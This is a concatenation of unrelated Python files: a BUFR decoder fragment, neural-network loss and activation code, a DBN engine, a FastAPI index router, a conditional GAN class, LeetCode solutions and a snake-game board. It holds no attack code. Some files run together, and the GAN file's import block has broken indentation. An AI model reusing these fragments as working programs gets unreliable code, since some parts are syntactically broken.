                    self._alter['scale'] = 0
                    self._alter['refmul'] = 1
                    self._alter['wnum'] = 0
                else:
                    self._alter['scale'] = an
                    # BUGFIX: "^" is XOR in Python; the reference-value
                    # multiplier for 207YYY is 10 to the power of YYY.
                    self._alter['refmul'] = 10 ** an
                    # Integer division (was "/", which yields a float on Py3).
                    self._alter['wnum'] = ((10 * an) + 2) // 3
            elif am == 8:
                # Change data width for characters
                self._alter['wchr'] = an * 8 if an else 0
            elif am == 9:
                # IEEE floating point representation
                self._alter['ieee'] = an
            elif am == 21:
                # Data not present
                self._skip_data = an
            else:
                # BUGFIX: format the message (was passed as a second argument,
                # leaving the placeholder unfilled).
                raise BufrDecodeError("Operator %06d not implemented." % dl[l_di])
        elif dl[l_di] == 222000:
            # Quality Assessment Information
            logger.debug("OP %d", dl[l_di])
            en = self._tables.tab_c.get(dl[l_di], ("Operator",))
            # An additional rval for operators where no further action is required
            l_rval = (dl[l_di], None, (en[0], None))
        elif dl[l_di] == 223000 or dl[l_di] == 223255:
            # Substituted values
            raise NotImplementedError("Operator %06d not implemented."% dl[l_di])
        elif dl[l_di] == 224000 or dl[l_di] == 224255:
            # First-order statistical values
            raise NotImplementedError("Operator %06d not implemented."% dl[l_di])
        elif dl[l_di] == 225000 or dl[l_di] == 225255:
            # Difference statistical values
            raise NotImplementedError("Operator %06d not implemented."% dl[l_di])
        elif dl[l_di] == 232000 or dl[l_di] == 232255:
            # Replaced/retained values
            raise NotImplementedError("Operator %06d not implemented."% dl[l_di])
        elif dl[l_di] == 235000:
            # Cancel backward data reference
            raise NotImplementedError("Operator %06d not implemented."% dl[l_di])
        elif dl[l_di] == 236000:
            # Define data present bit-map
            raise NotImplementedError("Operator %06d not implemented."% dl[l_di])
        elif dl[l_di] == 237000:
            # Use data present bit-map
            raise NotImplementedError("Operator %06d not implemented."% dl[l_di])
        elif dl[l_di] == 237255:
            # Cancel data present bit-map
            raise NotImplementedError("Operator %06d not implemented."% dl[l_di])
        elif dl[l_di] == 241000:
            # Define event
            raise NotImplementedError("Operator %06d not implemented."% dl[l_di])
        elif dl[l_di] == 241255:
            # Cancel event
            raise NotImplementedError("Operator %06d not implemented."% dl[l_di])
        elif dl[l_di] == 242000:
            # Define conditioning event
            raise NotImplementedError("Operator %06d not implemented."% dl[l_di])
        elif dl[l_di] == 242255:
            # Cancel conditioning event
            raise NotImplementedError("Operator %06d not implemented."% dl[l_di])
        elif dl[l_di] == 243000:
            # Categorial forecast values follow
            raise NotImplementedError("Operator %06d not implemented."% dl[l_di])
        elif dl[l_di] == 243255:
            # Cancel categorial forecast
            raise NotImplementedError("Operator %06d not implemented."% dl[l_di])
        else:
            raise BufrDecodeError("Operator %06d not implemented."% dl[l_di])
        return l_di, l_rval

    def _read_refval(self, dl, di, de):
        """
        Reads a set of YYY bits, taking them as new reference values for the descriptors of the set.
        YYY is taken from the current descriptor dl[di]; reference values are set for
        all subsequent descriptors until the descriptor signalling end of operation occurs.
        RETURN: index of the 2XX255 end-of-operation descriptor
        """
        i = di
        rl = {}
        an = dl[i] % 1000
        i += 1
        while i < de:
            rval = f.get_rval(self._blob, self.is_compressed, self.subs_num, fix_width=an)
            # BUGFIX: the sign is the highest of the an bits; the previous
            # test "1 << (an - 1)" was always true, making every new
            # reference value negative.
            sign = -1 if rval & (1 << (an - 1)) else 1
            # Value = rval & (0xFF.. >> 1), i.e. all bits below the sign bit
            # (previously the sign bit was left in the value).
            val = (((1 << an) - 1) >> 1) & rval
            rl[dl[i]] = sign * val
            i += 1
            if dl[i] > 200000 and dl[i] % 1000 == 255:
                # YYY==255 is signal-of-end
                break
        self._alter['refval'] = rl
        return i

    def _reset_alter(self):
        """Return a fresh dict of default alterator values."""
        return {
            'wnum':0,     # Add to width, for number data fields.
            'wchr':0,     # Change width for string data fields.
            'refval':{},  # {desc:ref}, dict with new reference values for descriptors.
            'refmul':1,   # Multiplier, for all reference values of following descriptors (207yyy).
            'scale':0,    # Add to scale, for number data fields.
            'assoc':[0],  # Add width for associated quality field. A stack, always use last value.
            'ieee':0,     # 0|32|64 All numerical values encoded as IEEE floating point number.
        }
|
from math import *
import numpy as np
import random
import sys
def identity(x):
    """Identity function: return the argument unchanged."""
    return x
class Cost(object):
    """Cost (loss) function selected by name.

    F(y, h) evaluates the cost of hypothesis h against targets y, summed per
    sample (axis 1); D(y, h) is the element-wise derivative used for
    back-propagation.
    """
    def __init__(self, type='Bernoulli'):
        # type: 'Bernoulli' (cross-entropy), 'square' or 'hamming';
        # anything else raises ValueError.
        self.type = type
        if type == 'Bernoulli':
            self.F = Cost.Bernoulli_function
            self.D = Cost.Bernoulli_derivative
        elif type == 'square':
            self.F = Cost.square_function
            self.D = Cost.square_derivative
        elif type == 'hamming':
            self.F = Cost.hamming_function
            self.D = Cost.hamming_derivative
        else:
            raise ValueError

    @staticmethod
    def support_functions():
        # Names accepted by the constructor.
        return [ 'Bernoulli', 'square', 'hamming' ]

    @staticmethod
    @np.vectorize
    def likelihood(y, h):
        """Element-wise Bernoulli log-likelihood y*log(h) + (1-y)*log(1-h),
        guarded with machine epsilon so log(0) and 0*log(...) never occur."""
        res, eps = 0., np.finfo(float).eps
        # Flags: is y (resp. h) numerically 0 or 1?
        y0, y1 = np.fabs(y - 0.) < eps, np.fabs(y - 1.) < eps
        h0, h1 = np.fabs(h - 0.) < eps, np.fabs(h - 1.) < eps
        # First term y*log(h), replaced by eps in the degenerate cases.
        res = eps if (y0 or h1) else ( y * np.log( h if (not h0) else eps))
        # Second term (1-y)*log(1-h), same guards mirrored.
        res += eps if (y1 or h0) else ((1.-y) * np.log((1.-h) if (not h1) else eps))
        return res

    @staticmethod
    def Bernoulli_function(y, h):
        """Negative log-likelihood: -sum( y*np.log(h) + (1.-y)*np.log(1.-h) ) per sample."""
        return - np.sum( Cost.likelihood(y, h), axis=1 )

    @staticmethod
    @np.vectorize
    def Bernoulli_derivative(y, h):
        """(1.-y)/(1.-h) - y/h, the derivative of the Bernoulli cost w.r.t. h,
        with machine-epsilon guards against division by zero."""
        eps = np.finfo(float).eps
        h0, h1 = np.fabs(h-0.) < eps, np.fabs(h-1.) < eps
        res = ((1.-y)/(1.-h) if (not h1) else (1.-y)/eps)
        res -= ( y / h if (not h0) else y /eps)
        return res

    @staticmethod
    def square_function(y, h):
        # 0.5 * sum((y-h)^2) per sample.
        return np.sum(np.power(y - h, 2), axis=1) / 2.

    @staticmethod
    def square_derivative(y, h):
        # NOTE(review): returns y - h, i.e. the NEGATIVE of d/dh of the square
        # cost; the sign convention must match the caller's update rule.
        return y - h;

    @staticmethod
    def hamming_function(y, h):
        # sum(|y - h|) per sample.
        return np.sum(np.abs(y - h), axis=1)

    @staticmethod
    def hamming_derivative(y, h):
        # sign(y - h); same sign convention as square_derivative.
        return np.sign(y - h)
class Activation(object):
    """Activation function pair: F is the function itself, D its derivative."""

    def __init__(self, type='sigmoid'):
        """Select the activation by name; unknown names raise ValueError."""
        self.type = type
        if type == 'identity':
            self.F, self.D = identity, np.ones_like
        elif type == 'sigmoid':
            self.F, self.D = Activation.sigmoid_function, Activation.sigmoid_derivative
        elif type == 'hyperbolic':
            self.F, self.D = Activation.hyperbolic_function, Activation.hyperbolic_derivative
        elif type == 'softmax':
            self.F, self.D = Activation.softmax_function, Activation.softmax_derivative
        elif type == 'ReLU':
            self.F, self.D = Activation.ReLU_function, Activation.ReLU_derivative
        elif type == 'rectifier':
            self.F, self.D = Activation.rectifier_function, Activation.rectifier_derivative
        else:
            raise ValueError

    @staticmethod
    def support_functions():
        """Names accepted by the constructor."""
        return ['identity', 'sigmoid', 'hyperbolic',
                'softmax', 'ReLU', 'rectifier']

    @staticmethod
    def sigmoid_function(x, a=1.):
        """Logistic sigmoid 1 / (1 + exp(-a*x))."""
        return 1. / (1. + np.exp(-a * x))

    @staticmethod
    def sigmoid_derivative(x, a=1.):
        """a * s * (1 - s) where s = sigmoid(a*x)."""
        sig = Activation.sigmoid_function(x, a)
        return a * sig * (np.ones_like(sig) - sig)

    @staticmethod
    def hyperbolic_function(x, a=1.):
        """tanh(a*x) = (exp(a*x) - exp(-a*x)) / (exp(a*x) + exp(-a*x))."""
        return np.tanh(a * x)

    @staticmethod
    def hyperbolic_derivative(x, a=1.):
        """a * (1 - tanh(a*x)^2)."""
        th = Activation.hyperbolic_function(x, a)
        return a * (1. - th * th)

    @staticmethod
    def softmax_function(x):
        """exp(x_i) / sum_i(exp(x_i)).

        NOTE(review): exp(x) can overflow for large x; subtracting max(x)
        first would be numerically safer (kept as-is to preserve behaviour).
        """
        exps = np.exp(x)
        return exps / np.sum(exps)

    @staticmethod
    def softmax_derivative(x):
        """s * (1 - s) with s = softmax(x)."""
        sm = Activation.softmax_function(x)
        return sm * (1. - sm)

    @staticmethod
    def ReLU_function(x):
        """max(0, x), written without branching."""
        return x * (x > 0.)

    @staticmethod
    def ReLU_derivative(x):
        """1 for x > 0, else 0."""
        return 1. * (x > 0.)

    @staticmethod
    def rectifier_function(x):
        """Softplus: log(1 + exp(x))."""
        return np.log(1. + np.exp(x))

    @staticmethod
    def rectifier_derivative(x):
        """d/dx softplus = sigmoid(x)."""
        return Activation.sigmoid_function(x)
class Regularization(object):
    """Weight-regularisation penalty: F gives the penalty value for a weight
    array, D its derivative (gradient contribution)."""

    def __init__(self, type='L2'):
        """Select the penalty by name; only 'L0', 'L1' and 'L2' are supported."""
        self.type = type
        if type == 'L0':
            self.F = identity
            self.D = np.ones_like
        elif type == 'L1':
            self.F = Regularization.L1_F
            self.D = Regularization.L1_D
        elif type == 'L2':
            self.F = Regularization.L2_F
            self.D = identity
        else:
            raise Exception('Supported functions: L0, L1, L2')

    @staticmethod
    def support_functions(): return [ 'L0', 'L1', 'L2' ]

    # BUGFIX: the two L1 implementations were swapped -- the *function*
    # returned sign(x) (which is the derivative of |x|) while the
    # *derivative* returned sum(|x|) (the penalty itself).  Bodies exchanged
    # so that, consistently with L2, F is the penalty value and D its
    # derivative.
    @staticmethod
    def L1_F(x): return np.sum(np.abs( x.reshape( (1, np.prod(x.shape)) ) ))

    @staticmethod
    def L1_D(x): return (x > 0) * 2 - 1.0  # sign(x); note it yields -1 at x == 0

    @staticmethod
    def L2_F(x): return np.sum(np.power( x.reshape( (1, np.prod(x.shape)) ), 2)) * 0.5
|
from typing import List

# The following 3 lines of codes are for UnitTest and you don't need them for your real applications!
global shopping_list
global stock
global prices

shopping_list = ["banana", "orange", "apple"]

stock = {
    "banana": 6,
    "apple": 0,
    "orange": 32,
    "pear": 15
}

prices = {
    "banana": 4,
    "apple": 2,
    "orange": 1.5,
    "pear": 3
}

# Write your code below!
def compute_bill(food: List[str]) -> float:
    """Charge every in-stock item in *food* and decrement its stock count.

    Out-of-stock items are skipped; unknown items raise KeyError.
    """
    bill = 0
    for product in food:
        if stock[product] <= 0:
            continue  # sold out -- nothing charged
        bill += prices[product]
        stock[product] -= 1
    return bill
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
CS671 - Deep Learning and Its Applications
Even Semester 2018
Assignment 1, Group 3
Input generation for Q1.
"""
import sys
from random import randint, uniform
# Integers: ten lines, each with two random digits drawn from [1, 9].
# BUGFIX: write through the file handle instead of hijacking sys.stdout
# (which was never restored), close files deterministically, and stop
# shadowing the name "file".
with open("../data/input/q1/input1.txt", "w") as f:
    for _ in range(10):
        print(str(randint(1, 9)) + ' ' + str(randint(1, 9)), file=f)

# Floats: ten lines, each with two random floats drawn from [1, 9].
with open("../data/input/q1/input2.txt", "w") as f:
    for _ in range(10):
        print(str(uniform(1, 9)) + ' ' + str(uniform(1, 9)), file=f)
import inspect
import time
import numpy as np
import matplotlib.pyplot as plt
from skimage import io
import tensorflow as tf
from app_global import FLAGS
from tensorflow.examples.tutorials.mnist import input_data
from rbm_engine import Rbm_Engine
from mlp_engine import Mlp_Engine
class Dbn_Engine(object):
    """Deep Belief Network engine: a stack of RBMs pre-trained greedily
    layer by layer, then fine-tuned through an MLP engine."""

    # Training-mode constants, defined idiomatically as class attributes.
    TRAIN_MODE_NEW = 1
    TRAIN_MODE_CONTINUE = 2

    def __init__(self):
        self.datasets_dir = 'datasets/'
        self.random_seed = 1
        self.rbm_W = []
        self.rbm_b = []
        self.rbms = []
        self.rbm_graphs = []
        # Hidden-layer sizes of the stack; the input layer is 784 (28x28 MNIST).
        self.layers = [1024,784,512,256]
        self.name = 'dbn'
        prev = 784
        self.mlp_engine = None
        # One RBM per layer, each in its own TF graph; a layer's visible size
        # is the previous layer's hidden size.
        for idx, layer in enumerate(self.layers):
            rbm_str = 'rbm_' + str(idx+1)
            name = self.name + '_' + rbm_str
            tf_graph = tf.Graph()
            self.rbms.append(Rbm_Engine(name, tf_graph=tf_graph, n=prev,
                    num_hidden=layer))
            prev = layer
            self.rbm_graphs.append(tf_graph)

    def run(self, ckpt_file='work/dae.ckpt'):
        """Run the (already trained) stack through the MLP engine."""
        if self.mlp_engine is None:
            self.mlp_engine = Mlp_Engine(self.rbms, 'datasets')
        self.mlp_engine.run()

    def pretrain(self, X_train, X_validation):
        """Greedy layer-wise pre-training: each RBM is trained on the
        transformed output of the previous one.

        Returns the representations produced by the last RBM.
        """
        X_train_prev = X_train
        X_validation_prev = X_validation
        for idx, rbm in enumerate(self.rbms):
            print('pretrain:{0}'.format(rbm.name))
            tf_graph = self.rbm_graphs[idx]
            X_train_prev, X_validation_prev = self.pretrain_rbm(
                    self.rbm_graphs[idx], rbm,
                    X_train_prev, X_validation_prev)
        return X_train_prev, X_validation_prev

    def pretrain_rbm(self, graph, rbm, X_train, X_validation):
        # Train one RBM, then push both splits through it for the next layer.
        rbm.train(X_train, X_validation)
        X_train_next = rbm.transform(graph, X_train)
        X_validation_next = rbm.transform(graph, X_validation)
        return X_train_next, X_validation_next

    def train(self, mode=TRAIN_MODE_NEW, ckpt_file='work/dbn.ckpt'):
        """Full training: load MNIST, pre-train the RBM stack, fine-tune the MLP."""
        X_train, y_train, X_validation, y_validation, \
                X_test, y_test, mnist = self.load_datasets()
        self.pretrain(X_train, X_validation)
        if self.mlp_engine is None:
            self.mlp_engine = Mlp_Engine(self.rbms, 'datasets')
        self.mlp_engine.train()

    def load_datasets(self):
        """Load MNIST (one-hot labels) and return all splits plus the dataset object."""
        mnist = input_data.read_data_sets(self.datasets_dir,
                one_hot=True)
        X_train = mnist.train.images
        y_train = mnist.train.labels
        X_validation = mnist.validation.images
        y_validation = mnist.validation.labels
        X_test = mnist.test.images
        y_test = mnist.test.labels
        return X_train, y_train, X_validation, y_validation, \
                X_test, y_test, mnist
import logging
from typing import List
from fastapi import APIRouter, Depends, HTTPException, Response, status, Request
from fastapi.param_functions import Body, Path
from ..models.embedding import DocumentEmbedding
from ..models.httperror import HTTPError
from ..models.index import Index, IndexRequest, IndexStatus
from .dependencies import get_search_client, get_storage_connector, client_credentials, get_mongo_client
from ..core.es.connector import ElasticsearchConnector
from ..core.mongo import MongoClient
# Module-level logger for this router module.
logger = logging.getLogger(__name__)
# All endpoints below are grouped under the "Indices" tag in the OpenAPI docs.
router = APIRouter(tags=["Indices"])
# Item type recorded in MongoDB bindings for access control on indices.
binding_item_type = 'index'
@router.get(
    "",
    summary="Lists all indices of a datastore",
    description="Returns a list of all indices in a datastore.",
    responses={
        200: {
            "description": "List of all indices found",
            "model": List[Index],
        }
    },
)
async def get_all_indices(
    datastore_name: str = Path(..., description="Datastore name"),
    conn=Depends(get_storage_connector),
):
    # Delegate straight to the storage backend; no post-processing needed.
    return await conn.get_indices(datastore_name)
@router.get(
    "/{index_name}",
    summary="Get an index by its name",
    description="Returns an index for a datastore given its name.",
    responses={
        200: {"model": Index, "description": "The requested index"},
        404: {
            "description": "The requested index does not exist",
            "model": HTTPError,
        },
    },
)
async def get_index(
    datastore_name: str = Path(..., description="Name of the datastore"),
    index_name: str = Path(..., description="Name of the index"),
    conn=Depends(get_storage_connector),
):
    # Guard clause: missing index -> 404; otherwise return it directly.
    index = await conn.get_index(datastore_name, index_name)
    if index is None:
        raise HTTPException(status_code=404, detail="Index not found.")
    return index
@router.put(
    "/{index_name}",
    summary="Creates a new index or updates it if it exists",
    description="Creates a new index in the specified datastore of a index with that name allready exists it is updated to the given configuration",
    responses={
        200: {"model": Index, "description": "The configuration of the updated index"},
        201: {"model": Index, "description": "The configuration of the created index"},
        400: {"model": HTTPError, "description": "The creation of the index failed in the API database"},
        500: {"model": HTTPError, "description": "The update of the index failed in VESPA"},
    },
)
async def put_index(
    request: Request,
    datastore_name: str = Path(..., description="Name of the datastore"),
    index_name: str = Path(..., description="Name of the index"),
    index_request: IndexRequest = Body(..., description="The index configuration as IndexRequest"),
    conn: ElasticsearchConnector = Depends(get_storage_connector),
    response: Response = None,
    mongo: MongoClient = Depends(get_mongo_client)
):
    existing = await conn.get_index(datastore_name, index_name)
    if existing is None:
        # Create path: build the index and register it in storage.
        new_index = index_request.to_index(datastore_name, index_name)
        success = await conn.add_index(new_index) is not None
        response.status_code = status.HTTP_201_CREATED
        if success:
            # Binding is created only after storage succeeded, so the two
            # systems stay consistent.
            await mongo.new_binding(request, index_name, binding_item_type)
    else:
        # Update path: verify the caller's access before modifying anything.
        await mongo.autonomous_access_checking(request, index_name, binding_item_type)
        new_index = index_request.to_index(datastore_name, index_name)
        success = await conn.update_index(new_index)
        response.status_code = status.HTTP_200_OK
    if not success:
        raise HTTPException(status_code=400)
    await conn.commit_changes()
    return new_index
@router.get(
    "/{index_name}/status",
    summary="Gets the status of an index",
    description="Returns whether an index is currently available for search.",
    responses={
        200: {"model": IndexStatus, "description": "Index status information."},
        404: {
            "description": "The requested index does not exist",
            "model": HTTPError,
        },
    },
)
async def get_index_status(
    datastore_name: str = Path(..., description="Name of the datastore"),
    index_name: str = Path(..., description="Name of the index"),
    conn=Depends(get_storage_connector),
    dense_retrieval=Depends(get_search_client),
    credential_token=Depends(client_credentials)
):
    # Guard clause: the index must exist before we ask about availability.
    index = await conn.get_index(datastore_name, index_name)
    if index is None:
        raise HTTPException(status_code=404, detail="Index not found.")
    is_available = await dense_retrieval.status(datastore_name, index_name, credential_token)
    return IndexStatus(is_available=is_available)
@router.delete(
    "/{index_name}",
    summary="Delete an index",
    description="Deletes the index with the corresponding name and all embeddings contained in the index",
    responses={
        204: {"description": "Successfully deleted index"},
        404: {"model": HTTPError, "description": "Failed to delete index in API database"},
        500: {"model": HTTPError, "description": "Failed to delete index in the storage backend."},
    },
)
async def delete_index(
    request: Request,
    datastore_name: str = Path(..., description="The name of the datastore"),
    index_name: str = Path(..., description="The name of the index"),
    conn: ElasticsearchConnector = Depends(get_storage_connector),
    mongo: MongoClient = Depends(get_mongo_client)
):
    # Guard clause: nothing to delete -> 404.
    existing = await conn.get_index(datastore_name, index_name)
    if not existing:
        raise HTTPException(status_code=404)
    # Verify the caller may modify this index before touching storage.
    await mongo.autonomous_access_checking(request, index_name, binding_item_type)
    if not await conn.delete_index(datastore_name, index_name):
        raise HTTPException(status_code=404)
    # Storage deletion succeeded: remove the binding and persist changes.
    await mongo.delete_binding(request, index_name, binding_item_type)
    await conn.commit_changes()
    return Response(status_code=204)
@router.get(
    "/{index_name}/embeddings/{doc_id}",
    summary="Get embedding for a document",
    description="Returns the embedding for a document in the indexwith the given id",
    responses={
        200: {"model": DocumentEmbedding, "description": "The embedding for the document with the given id"},
        404: {"model": HTTPError, "description": "Failed to find embedding for document with given id"},
    },
    response_model=DocumentEmbedding,
)
async def get_document_embedding(
    datastore_name: str = Path(..., description="The name of the datastore"),
    index_name: str = Path(..., description="The name of the index"),
    doc_id: str = Path(..., description="The id of the document"),
    dense_retrieval=Depends(get_search_client),
):
    try:
        vector = await dense_retrieval.get_document_embedding(datastore_name, index_name, doc_id)
        return DocumentEmbedding(id=doc_id, embedding=vector)
    except ValueError as err:
        # Search client signals "unknown document" with ValueError.
        raise HTTPException(status_code=404, detail=str(err))
    except Exception as err:
        raise HTTPException(status_code=500, detail=str(err))
# TODO
# @router.post("/{index_name}/indexing")
# async def update_index(
# datastore_name: str = Path(...), index_name: str = Path(...), reindex: str = Path(...), filtering: list = Body([])
# ):
# pass
|
import os
import numpy as np
import tensorflow as tf
import tensorflow_probability as tfp
import tempfile
try:
from misc import *
from decoder_generator_base import DecoderGenerator
except ImportError:
from .misc import *
from .decoder_generator_base import DecoderGenerator
class cDecoderGenerator(DecoderGenerator):
    """
    Conditional decoder/generator: builds generator inputs as
    (condition..., latent) tuples and mirrors the data layout
    (condition..., target).

    NOTE: Current code requires that the generator output has the same format as
    the discriminator input, including any conditioning. I.e. the generator must
    output the same conditions it used as input, to bypass it to the critic.
    """
    def __init__(self, data_sampler, **kw):
        super().__init__( data_sampler, **kw )
        # When set to True, must specify
        self.use_same_real_fake_conditioning = retrieve_kw(kw, 'use_same_real_fake_conditioning', True )
        # Only the True path is implemented below.
        if self.use_same_real_fake_conditioning is False:
            raise NotImplementedError("use_same_real_fake_conditioning must be set to True.")
        # Supposed to sample all info except the latent space
        self.generator_sampler = retrieve_kw(kw, 'generator_sampler', None )
    def sample_generator_input(self, sampled_input = None, latent_data = None, n_samples = None, ds = None):
        """
        Sample condition and latent data.
        - sampled_input: extract condition from sampled_input. To be used when
          generator input should be aligned with the data conditions
        - latent_data: specify the latent data to be used. If n_samples is
          specified and latent_data is larger than it, use first latent samples.
        - n_samples: If sampled input and latent_data is not specified, sample
          this number of samples from the condition and latent datasets and
          return them.
        - ds: dataset from which to sample the conditions from when sampled_input
          is not specified.
        """
        if self.use_same_real_fake_conditioning:
            sampler = self.data_sampler
        else:
            # FIXME note that if use_same_real_fake_conditioning is set to false, the
            # generator_sampler is not used when sampled_input is specified.
            sampler = self.generator_sampler
        if sampled_input is None:
            if ds is None:
                raise ValueError("ds must be specified if not specifying sampled_input.")
            # Pull the next batch from a cached iterator stored on the instance;
            # re-create the iterator when it is exhausted or not yet cached.
            def safe_sampler( iter_prop, sampler ):
                try:
                    sampled_input = next(self.__dict__[iter_prop])
                except (StopIteration, KeyError):
                    self.__dict__[iter_prop] = iter(sampler)
                    sampled_input = next(self.__dict__[iter_prop])
                return sampled_input
            if n_samples is None:
                # No explicit size: step through the evaluation sampler of
                # the requested split, one batch at a time.
                if ds == 'train':
                    sampled_input = safe_sampler("_cached_train_sampler", sampler.evaluation_sampler_from_train_ds)
                elif ds == 'val':
                    sampled_input = safe_sampler("_cached_val_sampler", sampler.evaluation_sampler_from_val_ds)
                elif ds == 'test':
                    sampled_input = safe_sampler("_cached_test_sampler", sampler.evaluation_sampler_from_test_ds)
            else:
                sampled_input = sampler.sample( n_samples = n_samples, ds = ds )
        condition = to_tuple(self.extract_condition_from_generator_input( sampled_input ))
        if n_samples is None:
            n_samples = condition[0].shape[0]
        else:
            # Reconcile the requested n_samples with the sampled batch size:
            # either truncate the conditions, or tile them to a multiple.
            condition_bs = condition[0].shape[0]
            if n_samples < condition_bs:
                condition = [c[:n_samples,...] for c in condition]
            else:
                if n_samples % condition_bs:
                    raise NotImplementedError("Cannot use non-batch-multiple value for n_samples.")
                tile_multiples = [n_samples // condition_bs] + [1]*condition[0].shape[1:].rank
                condition = [tf.tile(c,tile_multiples) for c in condition]
        if latent_data is None:
            latent_data = self.sample_latent( n_samples )
        else:
            # Use only the first n_samples latent vectors.
            latent_data = latent_data[:n_samples,...]
        generator_input = self.build_generator_input(condition, latent_data)
        generator_input = self._ensure_batch_size_dim(self.generator, generator_input)
        return generator_input
    def get_batch_size_from_data(self,data):
        # Batch size is the leading dimension of the first tensor.
        return data[0].shape[0]
    def get_non_batch_dimension_size_from_data(self,data):
        return data[0].shape[1:]
    def extract_condition_from_data(self, data ):
        # Data layout is (condition..., target): everything but the last entry.
        return data[:-1]
    def extract_target_space_from_data(self, data ):
        return data[-1]
    def build_input(self, condition, data):
        # Concatenate condition and data tuples into one flat input tuple.
        condition = to_tuple(condition)
        data = to_tuple(data)
        return condition + data
    def extract_condition_from_generator_input(self, data ):
        # Assume that condition on generator input has the same position as in data
        return self.extract_condition_from_data( data )
    def extract_latent_from_generator_input(self, data ):
        # Generator input layout is (condition..., latent).
        return data[-1]
    def build_generator_input(self, condition, latent):
        condition = to_tuple(condition)
        latent = to_tuple(latent)
        return condition + latent
    def _ensure_batch_size_dim(self, model, inputs):
        # Prepend batch dimensions until the inputs' rank matches the
        # model's expected input rank.
        gm_len = len(model.input[0].shape)
        gi_len = len(inputs[0].shape)
        if gi_len > gm_len:
            raise ValueError("Extract generator input with size larger than actual model input")
        while gi_len != gm_len:
            inputs = [tf.expand_dims(i,axis=0) for i in inputs ]
            gi_len = len(inputs[0].shape)
        return inputs
    def _train_base(self, epoch, step, sample_batch):
        # FIXME Ensure that sample generator uses generator conditioning
        generator_batch = self.sample_generator_input( sample_batch, ds = "train" )
        # Train only the critic on n_critic off-steps and during critic
        # pretraining; otherwise update both critic and generator.
        if (self._n_critic and (step % self._n_critic)) or (step != 0 and self._n_pretrain_critic is not None and step < self._n_pretrain_critic):
            # Update only critic
            loss_dict = self._train_step(data_batch = sample_batch, gen_batch = generator_batch, critic_only = True)
        else:
            # Update critic and generator
            loss_dict = self._train_step(data_batch = sample_batch, gen_batch = generator_batch, critic_only = False)
        return loss_dict
|
# 616. Add Bold Tag in String
# Medium
# 35538FavoriteShare
# Given a string s and a list of strings dict, you need to add a closed pair of bold tag <b> and </b> to wrap the substrings in s that exist in dict. If two such substrings overlap, you need to wrap them together by only one pair of closed bold tag. Also, if two substrings wrapped by bold tags are consecutive, you need to combine them.
# Example 1:
# Input:
# s = "abcxyz123"
# dict = ["abc","123"]
# Output:
# "<b>abc</b>xyz<b>123</b>"
# Example 2:
# Input:
# s = "aaabbcc"
# dict = ["aaa","aab","bc"]
# Output:
# "<b>aaabbc</b>c"
# Note:
# 1. The given dict won't contain duplicates, and its length won't exceed 100.
# 2. All the strings in input have length in range [1, 1000].
class Solution:
    def addBoldTag(self, s: str, dict: List[str]) -> str:
        """Wrap every maximal run of characters covered by any word in
        *dict* with a single <b>...</b> pair (overlapping/adjacent matches
        merge into one run)."""
        n = len(s)
        covered = [False] * n
        # Mark every character belonging to some occurrence of a word.
        for word in dict:
            w = len(word)
            for start in range(n - w + 1):
                if s[start:start + w] == word:
                    for k in range(start, start + w):
                        covered[k] = True
        # Single pass: open a tag when entering a covered run, close when leaving.
        pieces = []
        inside = False
        for ch, flag in zip(s, covered):
            if flag and not inside:
                pieces.append("<b>")
                inside = True
            elif not flag and inside:
                pieces.append("</b>")
                inside = False
            pieces.append(ch)
        if inside:
            pieces.append("</b>")
        return "".join(pieces)
|
import numpy
class Solution(object):
    def findMedianSortedArrays(self, nums1, nums2):
        """
        Return the median of the two (sorted) input lists as a float.

        :type nums1: List[int]
        :type nums2: List[int]
        :rtype: float
        """
        merged = nums1 + nums2
        # numpy.median handles both odd and even total lengths
        # (mean of the two middle values for even counts).
        return float(numpy.median(merged))
if __name__ == "__main__":
    # Quick manual check of the median implementation.
    num1 = [1, 2]
    num2 = [3, 4]
    s = Solution()
    # Fix: the original used the Python-2-only `print s....` statement;
    # the parenthesized call works under both Python 2 and 3.
    print(s.findMedianSortedArrays(num1, num2))
    # [] [1] returns 1
from copy import deepcopy
import square
import queue
class Board:
    """Grid model of a snake-game board: food, snakes, and per-square metadata.

    Squares are indexed as ``self.squares[x][y]``; snake dicts come from the
    game-state payload parsed by :meth:`parse_board`.
    """

    def __init__(self):
        # Dispatch table mapping a move name to its neighbor-validation helper.
        self.MOVES = {
            "up": self.get_valid_neighbor_up,
            "down": self.get_valid_neighbor_down,
            "left": self.get_valid_neighbor_left,
            "right": self.get_valid_neighbor_right,
        }
        self.width = -1
        self.height = -1
        self.food = []
        self.snakes = {}
        self.squares = []

    def parse_board(self, data):
        """Populate the board from a game-state dict (width/height/food/snakes)."""
        self.width = data["width"]
        self.height = data["height"]
        self.food = data["food"]
        self.snakes = {snake["id"]: snake for snake in data["snakes"]}
        # Fresh grid of squares, columns first (squares[x][y]).
        self.squares = [[square.Square() for _ in range(self.height)]
                        for _ in range(self.width)]
        for food in self.food:
            self.squares[food["x"]][food["y"]].set_contains_food()
        for snake in self.snakes.values():
            for i in range(snake["length"]):
                body = snake["body"][i]
                # Distance-to-vacant counts down along the body; i == 0 is the head.
                self.squares[body["x"]][body["y"]].add_snake(
                    snake["id"], snake["length"] - i, i == 0)

    def __str__(self):
        string = ( f"Width: {self.width}\n"
                   f"Height: {self.height}\n"
                   f"Food: {self.food}\n"
                   f"Snakes: {self.snakes}\n" )
        for x, column in enumerate(self.squares):
            for y, sq in enumerate(column):
                string += f"[{x},{y}] {sq}\n"
        return string

    # NAVIGATION
    def is_valid_destination(self, snake_id, coordinates, distance):
        """Return True when *coordinates* are on-board and reachable in
        *distance* moves (any occupying snake body will have vacated by then)."""
        x, y = coordinates
        # Check if coordinates are out of bounds.
        if x < 0 or y < 0 or x >= self.width or y >= self.height:
            return False
        # Occupied square: valid only if it empties before we arrive.
        sq = self.squares[x][y]
        if sq.snakes:
            if sq.longest_distance_to_vacant() > distance:
                return False
        return True

    def get_valid_neighbor(self, move, snake_id, x, y, distance=1):
        """Dispatch to the directional helper named by *move*."""
        return self.MOVES[move](snake_id, x, y, distance)

    def _checked_neighbor(self, snake_id, neighbor, distance):
        """Return *neighbor* when it is a valid destination, else (None, None)."""
        return neighbor if self.is_valid_destination(snake_id, neighbor, distance) \
            else (None, None)

    def get_valid_neighbor_up(self, snake_id, x, y, distance=1):
        return self._checked_neighbor(snake_id, (x, y + 1), distance)

    def get_valid_neighbor_down(self, snake_id, x, y, distance=1):
        return self._checked_neighbor(snake_id, (x, y - 1), distance)

    def get_valid_neighbor_left(self, snake_id, x, y, distance=1):
        return self._checked_neighbor(snake_id, (x - 1, y), distance)
